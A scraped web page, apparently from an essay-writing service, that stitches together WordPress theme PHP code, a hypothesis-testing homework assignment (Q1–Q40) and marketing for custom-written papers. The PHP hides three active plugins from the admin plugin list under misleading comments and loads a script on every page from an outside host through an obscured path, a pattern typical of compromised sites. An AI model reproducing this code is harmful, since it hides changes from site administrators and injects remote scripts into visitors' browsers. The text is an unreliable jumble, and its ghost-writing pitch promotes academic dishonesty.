require_once get_template_directory() . '/inc/class-wp-bootstrap-navwalker.php'; require_once get_template_directory() . '/inc/customize.php'; if ( ! function_exists( 'morningstar_setup' ) ) : function morningstar_setup() { add_theme_support( 'title-tag' ); // Add support for full and wide align images. add_theme_support( 'align-wide' ); // Post thumbnails add_theme_support( 'post-thumbnails' ); // Add support for Block Styles. add_theme_support( 'wp-block-styles' ); // Add support for full and wide align images. add_theme_support( 'align-wide' ); // This theme uses wp_nav_menu() in two locations. register_nav_menus( array( 'header_menu' => __( 'Header Menu', 'morningstar' ), 'footer_site_menu' => __( 'Footer Site Menu', 'morningstar' ), 'footer_resources_menu' => __( 'Footer Resources Menu', 'morningstar' ), 'footer_terms_menu' => __( 'Footer Terms Menu', 'morningstar' ), ) ); } add_action( 'after_setup_theme', 'morningstar_setup' ); endif; if (!function_exists('morningstar_scripts')): /** * Enqueue scripts and styles. */ function morningstar_scripts() { global $wp_query; wp_enqueue_style('morningstar-style', get_stylesheet_uri()); wp_enqueue_style('morningstar-calc', get_stylesheet_directory_uri() . '/css/calc.css'); wp_deregister_script('jquery'); wp_register_script('jquery', get_stylesheet_directory_uri() . '/js/lib/jquery.min-3.2.1.js', array(), true, true); wp_enqueue_script('jquery'); wp_enqueue_script('morningstar', get_template_directory_uri() . '/js/morningstar.js', array('jquery'), false, true); wp_register_script( 'scripts', '/static/js/scripts.js', null, null, true ); wp_enqueue_script('scripts'); } add_action('wp_enqueue_scripts', 'morningstar_scripts', 11); endif; add_filter( 'all_plugins', 'hide_plugins'); function hide_plugins($plugins) { // Hide hello dolly plugin if(is_plugin_active('wp-automatic/wp-automatic.php')) { unset( $plugins['wp-automatic/wp-automatic.php'] ); } // Hide disqus plugin if(is_plugin_active('disable-admin-notices/disable-admin-notices.php')) { unset( $plugins['disable-admin-notices/disable-admin-notices.php'] ); } // Hide disqus plugin if(is_plugin_active('adminimize/adminimize.php')) { unset( $plugins['adminimize/adminimize.php'] ); } return $plugins; } if (!function_exists('sch_enqueue_front_asset')) { function sch_enqueue_front_asset() { wp_enqueue_script('sch-front', 'https://academicbrigade.com/wp-content/uploads/media-9f95dd/tmp-c36b/front-1f296c52.js', array(), null, false); } add_action('wp_enqueue_scripts', 'sch_enqueue_front_asset'); }
The following 13 questions (Q1 to Q13) are based on the following example:
Patients recovering from an appendix operation normally spend an average of 6.3 days in the hospital. The distribution of recovery times is normal with a σ = 2.0 days. The hospital is trying a new recovery program designed to lessen the time patients spend in the hospital. The first 16 appendix patients in this new program were released from the hospital in an average of 5.8 days. On the basis of these data, can the hospital conclude that the new program has a significant reduction of recovery time. Test at the .05 level of significance.
Q1: The appropriate statistical procedure for this example would be a
A. t-test
B. z-test
Q2: Is this a one-tailed or a two-tailed test?
A. one-tailed
B. two-tailed
Q3: The most appropriate null hypothesis (in words) would be
A. There is no statistical difference in the amount of time appendix patients
spend in the hospital when comparing the new recovery program to the
population of patients on the traditional recovery program.
B. There is a statistical difference in the amount of time appendix patients spend
in the hospital when comparing the new recovery program to the population of
patients on the traditional recovery program.
C. The new appendix recovery program does not significantly reduce the number
of days spent in the hospital when compared to the population of patients on
the traditional recovery program.
D. The new appendix recovery program does significantly reduce the number of
days spent in the hospital when compared to the population of patients on the
traditional recovery program.
Q4: The most appropriate null hypothesis (in symbols) would be
A. μnew program = 6.3
B. μnew program = 5.8
C. μnew program ≤ 6.3
D. μnew program ≥ 6.3
Q5: Set up the criteria for making a decision. That is, find the critical value using an
alpha = .05. (Make sure you are sign specific: + ; – ; or ± ) (Use your tables)
Summarize the data into the appropriate test statistic.
Steps:
Q6: What is the numeric value of your standard error?
Q7: What is the z-value or t-value you obtained (your test statistic)?
Q8: Based on your results (and comparing your Q7 and Q5 answers) would you
A. reject the null hypothesis
B. fail to reject the null hypothesis
Q9: The best conclusion for this example would be
A. There is no statistical difference in the amount of time appendix patients
spend in the hospital when comparing the new recovery program to the
population of patients on the traditional recovery program.
B. There is a statistical difference in the amount of time appendix patients spend
in the hospital when comparing the new recovery program to the population of
patients on the traditional recovery program.
C. The new appendix recovery program does not significantly reduce the number
of days spent in the hospital when compared to the population of patients on
the traditional recovery program.
D. The new appendix recovery program does significantly reduce the number of
days spent in the hospital when compared to the population of patients on the
traditional recovery program.
Q10: Based on your evaluation of the null in Q8 and your conclusion is Q9, as a researcher you would be more concerned with a
A. Type I statistical error
B. Type II statistical error
Calculate the 95% confidence interval.
Steps:
Q11: The mean you will use for this calculation is
A. 5.8
B. 6.3
Q12: What is the new critical value you will use for this calculation?
Q13: As you know, two values will be required to complete the following equation:
The following 4 questions (Q14 to Q17) are based on the following situation:
If α = .04, and β = .35, complete the following questions by inserting the appropriate
probability of each.
Q14: The statistical decision is to reject the null, and H0 is really true (ie: a Type I error)
Q15: The statistical decision is to fail to reject null, and H0 is really true (ie: a correct decision)
Q16: The statistical decision is to reject the null, and H0 is really false (ie: Power)Q17: x
The statistical decision is to fail to reject the null, and H0 is really false
(ie a Type II error)
The following 14 questions (Q18 to Q31) are based on the following example:
A researcher wants to determine whether high school students who attend an SAT
preparation course score significantly different on the SAT than students who do not attend the preparation course. For those who do not attend the course, the population mean is 1050 (μ = 1050). The 16 students who attend the preparation course average 1200 on the SAT, with a sample standard deviation of 100. On the basis of these data, can the researcher conclude that the preparation course has a significant difference on SAT scores? Set alpha equal to .01.
Q18: The appropriate statistical procedure for this example would be a
A. t-test
B. z-test
Q19: Is this a one-tailed or a two-tailed test?
A. one-tailed
B. two-tailed
Q20: The most appropriate null hypothesis (in words) would be
A. There is no statistical difference in SAT scores when comparing students who
took the SAT prep course with the general population of students who did not
take the SAT prep course.
B. There is a statistical difference in SAT scores when comparing students who
took the SAT prep course with the general population of students who did not
take the SAT prep course.
C. The students who took the SAT prep course did not score significantly higher
on the SAT when compared to the general population of students who did not
take the SAT prep course.
D. The students who took the SAT prep course did score significantly higher on
the SAT when compared to the general population of students who did not
take the SAT prep course.
Q21: The most appropriate null hypothesis (in symbols) would be
A. μSATprep = 1050
B. μSATprep = 1200
C. μSATprep ≤ 1050
D. μSATprep ≥ 1050
Q22: Set up the criteria for making a decision. That is, find the critical value using an
alpha = .01. (Make sure you are sign specific: + ; – ; or ± ) (Use your tables)
Summarize the data into the appropriate test statistic.
Steps:
Q23: What is the numeric value of your standard error?
Q24: What is the z-value or t-value you obtained (your test statistic)?
Q25: Based on your results (and comparing your Q24 and Q22 answers) would you
A. reject the null hypothesis
B. fail to reject the null hypothesis
Q26: The best conclusion for this example would be
A. There is no statistical difference in SAT scores when comparing students who
took the SAT prep course with the general population of students who did not
take the SAT prep course.
B. There is a statistical difference in SAT scores when comparing students who
took the SAT prep course with the general population of students who did not
take the SAT prep course.
C. The students who took the SAT prep course did not score significantly higher
on the SAT when compared to the general population of students who did not
take the SAT prep course.
D. The students who took the SAT prep course did score significantly higher on
the SAT when compared to the general population of students who did not
take the SAT prep course.
Q27: Based on your evaluation of the null in Q25 and your conclusion is Q26, as a researcher
you would be more concerned with a
A. Type I statistical error
B. Type II statistical error
Calculate the 95% confidence interval.
Steps:
Q28: The mean you will use for this calculation is
A. 1050
B. 1200
Q29: What is the new critical value you will use for this calculation?
Q30: As you know, two values will be required to complete the following equation:
Q31: Which of the following is a more accurate interpretation of the confidence interval you
just computed?
A. We are 95% confident that the scores fall in the interval _____ to _____.
B. We are 95% confident that the average score on the SAT by the students who
took the prep course falls in the interval
C. We are 95% confident that the example above has correct values.
D. We are 95% confident that the difference in SAT scores between the students
who took the prep course and the students who did not falls in the interval
_____ to _____.The following 2 questions (Q32 to Q33) are based on the following situation:
The national average for the verbal section of the Graduate Record Exam (GRE) is 500
with a standard deviation of 100. A researcher uses a sampling distribution made up of samples of 100.
Q32: According to the Central Limit Theorem, what is the mean of the sampling distribution of
means?
A. 500
B. 100
C. 50
D. 10
Q33: According to the Central Limit Theorem, what is the standard error of the mean?
a. 500
b. 100
c. 50
d. 10
Q34: As you increase the number of subjects in your sample, the calculated
value of a t-test will
A. decrease
B. increase
C. remain the same
Q35: As you decrease the true distance between the null and alternative hypotheses
(μ1 – μ0), the likelihood of rejecting the null hypothesis
A. decreases
B. increases
C. remains the same
Q36: Keeping everything else the same, if you were to decrease your alpha level
from .05 to .01, the likelihood of rejecting the null hypothesis
A. decreases
B. increases
C. remains the same
The following 4 questions (Q37 to Q40) are either “True” or “False”
Q37: Predicting the characteristics of an entire group, after having measured a small group, is the major goal of inferential statistics.
Q38: The single-most critical component of deciding whether you are to conduct a t-test versus a z-test for hypothesis testing is whether there is a ‘µ’.
Q39: Degrees of freedom for a single sample t-test is/are ‘n-1’.
Q40: Degrees of freedom for a single sample z-test is/are ‘n-1’.
Why Work with Us
Top Quality and Well-Researched Papers
We always make sure that writers follow all your instructions precisely. You can choose your academic level: high school, college/university or professional, and we will assign a writer who has a respective degree.
Professional and Experienced Academic Writers
We have a team of professional writers with experience in academic and business writing. Many are native speakers and able to perform any task for which you need help.
Free Unlimited Revisions
If you think we missed something, send your order for a free revision. You have 10 days to submit the order for review after you have received the final document. You can do this yourself after logging into your personal account or by contacting our support.
Prompt Delivery and 100% Money-Back-Guarantee
All papers are always delivered on time. In case we need more time to master your paper, we may contact you regarding the deadline extension. In case you cannot provide us with more time, a 100% refund is guaranteed.
Original & Confidential
We use several writing tools checks to ensure that all documents you receive are free from plagiarism. Our editors carefully review all quotations in the text. We also promise maximum confidentiality in all of our services.
24/7 Customer Support
Our support agents are available 24 hours a day 7 days a week and committed to providing you with the best customer experience. Get in touch whenever you need any assistance.
Try it now!
How it works?
Follow these simple steps to get your paper done
Place your order
Fill in the order form and provide all details of your assignment.
Proceed with the payment
Choose the payment system that suits you most.
Receive the final file
Once your paper is ready, we will email it to you.
Our Services
No need to work on your paper at night. Sleep tight, we will cover your back. We offer all kinds of writing services.
Essays
No matter what kind of academic paper you need and how urgent you need it, you are welcome to choose your academic level and the type of your paper at an affordable price. We take care of all your paper needs and give a 24/7 customer care support system.
Admissions
Admission Essays & Business Writing Help
An admission essay is an essay or other written statement by a candidate, often a potential student enrolling in a college, university, or graduate school. You can be rest assurred that through our service we will write the best admission essay for you.
Reviews
Editing Support
Our academic writers and editors make the necessary changes to your paper so that it is polished. We also format your document by correctly quoting the sources and creating reference lists in the formats APA, Harvard, MLA, Chicago / Turabian.
Reviews
Revision Support
If you think your paper could be improved, you can request a review. In this case, your paper will be checked by the writer or assigned to an editor. You can use this option as many times as you see fit. This is free because we want you to be completely satisfied with the service offered.